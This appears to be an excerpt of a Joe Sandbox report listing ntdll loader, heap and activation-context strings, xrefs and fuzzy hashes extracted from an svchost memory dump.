                                                • minkernel\ntdll\ldrinit.c, xrefs: 03C6C6C3
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                                • Instruction ID: 27c9893bb2149173afc46c104941952e22cdb6c17c1ec651e4f26d593d9eebeb
                                                • Opcode Fuzzy Hash: d2ed629003ea68dd92e6fd7bf4bf9bce37fafc9a015559c217567559d64e1bcd
                                                • Instruction Fuzzy Hash: 5D310476744741AFC224EF28D946E2AB7E4EF94B14F050968F881EF291D620ED04D7A2
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 03CA21BF
                                                • SXS: %s() passed the empty activation context, xrefs: 03CA2165
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 03CA219F
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03CA2180
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03CA2178
                                                • RtlGetAssemblyStorageRoot, xrefs: 03CA2160, 03CA219A, 03CA21BA
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                                • Instruction ID: 6916c881a41f950019498c1d2f77126f589f02c97e221302d42998ffb5c3d423
                                                • Opcode Fuzzy Hash: c0779794cc62ccabb1866f96a7bd450aa9be9d5577c0630d80ebaaf72d91e9f3
                                                • Instruction Fuzzy Hash: 45310336F40225BBE721CA99CC81F9EB678DB95A44F094469FB04FB241D671EE00E7A1
                                                Strings
                                                • Kernel-MUI-Language-SKU, xrefs: 03C5542B
                                                • Kernel-MUI-Language-Allowed, xrefs: 03C5527B
                                                • Kernel-MUI-Language-Disallowed, xrefs: 03C55352
                                                • Kernel-MUI-Number-Allowed, xrefs: 03C55247
                                                • WindowsExcludedProcs, xrefs: 03C5522A
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                • API String ID: 0-258546922
                                                • Opcode ID: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                                • Instruction ID: 80d60eb807c4320fec72bba974ecd46de9b097f89655a218400b89b5f48f5f08
                                                • Opcode Fuzzy Hash: a90acbecf6198e53da48c34a3fd00dc92574ee55823bc74c3ff9e87cf674c41a
                                                • Instruction Fuzzy Hash: 84F16C76D10218EFCF11DF99C980AEEBBB9FF49650F16406AE902EB250D7709E40DB94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1975516107
                                                • Opcode ID: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                                • Instruction ID: 4d37704eabfd067065bbddff75f749ae4b4470e54d57ed5fcde24c9d5df644a4
                                                • Opcode Fuzzy Hash: de3940593aff8be51b9828352101068ecda1da8d1ecfee0ff1782e68e331a665
                                                • Instruction Fuzzy Hash: 57510F36A00345DFDB24EFA4D48879DBBB1BF59304F294059E802EF291C770AA80CBC4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                • API String ID: 0-3061284088
                                                • Opcode ID: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                                • Instruction ID: e9a8cb2dd3a9e927e0358f40e721af50ff32aff61212d1e208949f8525ffdb9f
                                                • Opcode Fuzzy Hash: bd621102b68cd9e9e7193980f76340ea8da9f70822d7996e4849687e7923254b
                                                • Instruction Fuzzy Hash: 810128761097A0DED22AF31AA409F56BBE4DB42B74F194059E010CF692CAA4AD80D560
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                • API String ID: 0-3178619729
                                                • Opcode ID: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                                • Instruction ID: 1f03a5d7873bcf6f2235eef059de66839e415d2f67846c08c87144ed7772d47f
                                                • Opcode Fuzzy Hash: 007d1b1713fb3d472a1f112c5b810a44e4df7210eb4ff6ede76680b73c341911
                                                • Instruction Fuzzy Hash: BA139970A00759CFDB29CF69C8907A9FBB1BF49304F1881A9D859EF381D735AA45CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-3570731704
                                                • Opcode ID: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                                • Instruction ID: a1d0ae9520d3b11266be84396c5945290bf75d2e0d7382c5b70b859d1afc349c
                                                • Opcode Fuzzy Hash: 72645a36680e143f17e9efca8a6c2449dc5946c60accdcfb861ebe4b5e26aa6e
                                                • Instruction Fuzzy Hash: 0E923875A01268CFEB25CF19C844BA9B7B5BF45314F0A81EAD989EB390D7349E80CF51
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                • Instruction ID: 8a01517463ba27e19304a8470170bb1423d67f8b7f67b32422c087714acd8aad
                                                • Opcode Fuzzy Hash: c5853ead38dd7d6f9be0b807a4534c3be05af2726b5684476bcc36cee8ed3f32
                                                • Instruction Fuzzy Hash: A5C187791083869FDB11DF19C044B6AB7F4BF8A704F04886AF8D6CB250E735CA59CB92
                                                Strings
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 03CA21D9, 03CA22B1
                                                • SXS: %s() passed the empty activation context, xrefs: 03CA21DE
                                                • .Local, xrefs: 03C628D8
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 03CA22B6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                • Instruction ID: b2826c32c868836ce46a7b669e1b236e9d08e5134f462f307af6c926902610be
                                                • Opcode Fuzzy Hash: fdca7f42b31faa6d844bf742c36a1554693964e4387efbb8b78418a8bde02ee3
                                                • Instruction Fuzzy Hash: CDA1903590022A9FDB24CF65CC84BA9B3B5BF58314F1949E9D948EB251D730AE81CF90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                • API String ID: 0-336120773
                                                • Opcode ID: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                • Instruction ID: 5f1bbe40d429d0cc9680e065787f1b3402d42bdfec66d537ad980fdef6b338d1
                                                • Opcode Fuzzy Hash: da149042040532db2c4f608fa831f5611827f26974554decd0587d9d43eb0193
                                                • Instruction Fuzzy Hash: F031DA76200260EFC751EB99CC86F6AB7E8EF09724F1D0055E411CF291E670FD50DA65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                • API String ID: 0-1391187441
                                                • Opcode ID: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                • Instruction ID: 2b16a97c4704c4ec8cd1ff08bf83539b0091b0c20610ef4143cc539dffe71925
                                                • Opcode Fuzzy Hash: e5eafaf359f0ef30b90fca86fed854e3492ec99a49106e14773ab6919dce4c8e
                                                • Instruction Fuzzy Hash: A531C676600214EFCB11EB46CC85FDEBBB8EF45B24F154061E814EB291D770EE40DA60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                • Instruction ID: e100f5f71dd4729802482125215530a71f7aa6944b1c79e0738688a54b3ef17b
                                                • Opcode Fuzzy Hash: 78a47837c847e0e564acb9056c43a6515cdfebdcf83bf62b57fe9de0461deabd
                                                • Instruction Fuzzy Hash: 77F1A735A40605DFEB25CF69C988B6AF7B5FB45300F1981A9E506DF381D730EA81CB90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                • API String ID: 0-1145731471
                                                • Opcode ID: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                • Instruction ID: 67316c3576ad3af2c8fb938c07dc30a641932aea88614c1fb25d343e6ccda35e
                                                • Opcode Fuzzy Hash: d5b35a7b40fb0bcd40e66d642715f178abfab4ffa2a12a26032e6a6574cec4f0
                                                • Instruction Fuzzy Hash: FAB19C7AA047849BDF25CF69C884BADB7B6EF45314F1A446AE851EB380D730ED40CB54
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                • API String ID: 0-2391371766
                                                • Opcode ID: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                • Instruction ID: 94041acdff6d14fe0c3d5a504aaac7474ecee571b9407ffc202430004e9228ae
                                                • Opcode Fuzzy Hash: cca0469bccdbac9f1ea6f3de2ce676d37f9af22542eb4f12ab82668b7ddbff29
                                                • Instruction Fuzzy Hash: 7CB1AF7A604381AFD321DE95C884FABB7F8EB54710F150929FA40EB290D775ED44CB92
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                • Instruction ID: 437486ede257791e510f956bc82f24a55c1816bbb80050964aeae1dedba7d6db
                                                • Opcode Fuzzy Hash: 4fd54bb9ed763a83541d46e30cebaf356249cce895ae621e7e4cb314a123e077
                                                • Instruction Fuzzy Hash: B2A16A759012299BDB21EB24CC88BEAF7B8EB44714F0541E9E909EB250DB35AFC5CF50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                • API String ID: 0-318774311
                                                • Opcode ID: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                • Instruction ID: 788c2d5aeef06ecedecd1d9d23ffc038318d47e1cd5879889e2ec6fe5b14cce8
                                                • Opcode Fuzzy Hash: b8be4b79cb537342504e471993a9e6bba2f83bfbadff045e693f8a026e59a221
                                                • Instruction Fuzzy Hash: 608198796283C0AFE311DB15D944B6AB7E8FF85750F09892DF980DB390DB38D9048B62
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %$&$@
                                                • API String ID: 0-1537733988
                                                • Opcode ID: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                • Instruction ID: 74a7dcb003fdeec920b2ab11c5ad6dd90826de3c09bfbc7d1be4758b298fea5f
                                                • Opcode Fuzzy Hash: 504d6c76d6aabbbf342aa9bf2200867030a521dfbed55b829e4ada3a32cec2a5
                                                • Instruction Fuzzy Hash: B171B1746087429FC714DF25C5C0A6BFBE9FF89618F24891DE49ACB251C731EA05CB92
                                                Strings
                                                • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 03D0B82A
                                                • GlobalizationUserSettings, xrefs: 03D0B834
                                                • TargetNtPath, xrefs: 03D0B82F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                • API String ID: 0-505981995
                                                • Opcode ID: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                • Instruction ID: 5e95eb2bdbfca965b4935152628dfb0b949ebdfd1cdde7e6dd6101aa6cb879cf
                                                • Opcode Fuzzy Hash: da5b7b499c26efec94aa2abb1684b415963fdfe8c3d64640c042de077b620766
                                                • Instruction Fuzzy Hash: 5F617076D45229ABDB21DF54DC88BDAB7B8EF54B10F0101E6A908EB290C774DE84CF90
                                                Strings
                                                • HEAP: , xrefs: 03C8E6B3
                                                • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 03C8E6C6
                                                • HEAP[%wZ]: , xrefs: 03C8E6A6
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                • API String ID: 0-1340214556
                                                • Opcode ID: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                • Instruction ID: 951c999233127f240e245bc3bd65afc6d00cdc77fe9c00f010a36a6227a3a770
                                                • Opcode Fuzzy Hash: c91c2238d789c985d85c509e12a70a97de394e38dba37779c5b77e93e347eec9
                                                • Instruction Fuzzy Hash: A751C336604798EFD712EB68C844BAAFBF8EF05704F0900A9E951CF692D774EA50DB50
                                                Strings
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 03CA82DE
                                                • minkernel\ntdll\ldrinit.c, xrefs: 03CA82E8
                                                • Failed to reallocate the system dirs string !, xrefs: 03CA82D7
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                • Instruction ID: 78c61bcc662049bfcdbdeb0d9ef0a11cb146565d0ef5fd3c0b6a8e0dd7cee46e
                                                • Opcode Fuzzy Hash: c39ae1916284f272e8d67b83b42e3bc39cd1d390205d3df38f6a7e92448940b2
                                                • Instruction Fuzzy Hash: B94115B6500310ABC720FB28DC84B5BBBE8FF59750F05492AF988DB250E770E910DB91
                                                Strings
                                                • LdrpAllocateTls, xrefs: 03CA1B40
                                                • minkernel\ntdll\ldrtls.c, xrefs: 03CA1B4A
                                                • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 03CA1B39
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-4274184382
                                                • Opcode ID: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                • Instruction ID: 7ef97095a0fa9db8470720eaf7932cbb88825973fec6e60cd8ca4d272fc351e0
                                                • Opcode Fuzzy Hash: fb29c41ec77d586e7c5ece2c834298da98c7f6e3f992240ec0c7fe47a360b6c1
                                                • Instruction Fuzzy Hash: 8541AC79A00609AFCB15DFA9D881BAEFBF5FF59714F098119E405EB300D774A900DB90
                                                Strings
                                                • @, xrefs: 03CEC1F1
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 03CEC1C5
                                                • PreferredUILanguages, xrefs: 03CEC212
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                • Instruction ID: a0480f67736134208c97ac29797a3d7e9999c823cfa0305824c3019b0f3446a5
                                                • Opcode Fuzzy Hash: b7a326c172865d660a2d378da5f5985c667c51a4e5e5ba0af82421c2ea68c6f9
                                                • Instruction Fuzzy Hash: D0418D76E0020AEFDB11DAD4C885FEEB7B8AB14700F05806AE905FB290D774AA449B90
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                • Instruction ID: 6e10281a0cc84889dd7462a7e4249357277955806e16dccee929315d26c2113e
                                                • Opcode Fuzzy Hash: cbbaa152420b5dfcbaac0e7cc0c92ca32a6b2811f0cdaefc77cec4681095eb85
                                                • Instruction Fuzzy Hash: 694102759203C88BEB2ADBA6C860BADB7B8EF55340F19445ED841EF391D6359A01CB10
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 03CB488F
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 03CB4899
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03CB4888
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                • Instruction ID: a33894e1ba7e9c23f903982c4811032c8dd2345cf374c7cb96160e770f7ac5a4
                                                • Opcode Fuzzy Hash: aee55ff02874af0fc01374a5fda4a24b9ba6d014d0833405732720e0de7ae7dc
                                                • Instruction Fuzzy Hash: 0141D7336087609FCB29CE6AD440AA6B7F9AF49650F090569EC58EB353D731DD00CB91
                                                Strings
                                                • RtlCreateActivationContext, xrefs: 03CA29F9
                                                • Actx , xrefs: 03C633AC
                                                • SXS: %s() passed the empty activation context data, xrefs: 03CA29FE
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                • API String ID: 0-859632880
                                                • Opcode ID: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                • Instruction ID: 03b72a08c182bb5336ff860b89f319b9103e72624536141364251502803ffbfa
                                                • Opcode Fuzzy Hash: b222cf6569ccf797637e902cbce818ca3ea0850945c635bb8d61d1622a5989dc
                                                • Instruction Fuzzy Hash: 423144362003529FDB22DE58C8C4BAABBA4FB44714F098469EC05DF2A1CB30ED41CB90
                                                Strings
                                                • minkernel\ntdll\ldrtls.c, xrefs: 03CA1A51
                                                • LdrpInitializeTls, xrefs: 03CA1A47
                                                • DLL "%wZ" has TLS information at %p, xrefs: 03CA1A40
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                • API String ID: 0-931879808
                                                • Opcode ID: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                                • Instruction ID: 8e18d4c532c18ac72847b7e34dc17a33451b7b2d9ac12bd43db9092cc4f8bb9a
                                                • Opcode Fuzzy Hash: 232ef4bde9ae74312ec0c00bd7998a828dfcc860c3629a13d79c6743acf75cec
                                                • Instruction Fuzzy Hash: 75310776A00200ABD720DB59D885F7AB7ADEB66759F0D0069F405EB280E770EE04A790
                                                Strings
                                                • @, xrefs: 03C712A5
                                                • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 03C7127B
                                                • BuildLabEx, xrefs: 03C7130F
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                • API String ID: 0-3051831665
                                                • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction ID: fe26cc9ad5032d75251f50edcf7d0ae56d1daffa60f2768b54bd8bc2efbd6819
                                                • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                                • Instruction Fuzzy Hash: 3531CD76900619AFCB11EFA5CC48EEEBBBDEB84714F054421ED14EB260DB30DA059BA0
                                                Strings
                                                • Process initialization failed with status 0x%08lx, xrefs: 03CB20F3
                                                • LdrpInitializationFailure, xrefs: 03CB20FA
                                                • minkernel\ntdll\ldrinit.c, xrefs: 03CB2104
                                                Memory Dump Source
                                                • Source File: 00000002.00000002.2158145354.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03C00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_2_2_3c00000_svchost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
                                                • Instruction ID: 5c0f2f6bc7b6f7ce4dad8e31f31dd53dd44d5ff83605bc2ee087e4196543a361
                                                • Opcode Fuzzy Hash: 9142230e8e5035fdb776e2b0f8f9e75cbc49eb9074c6a45e4d90a383e1932fb0
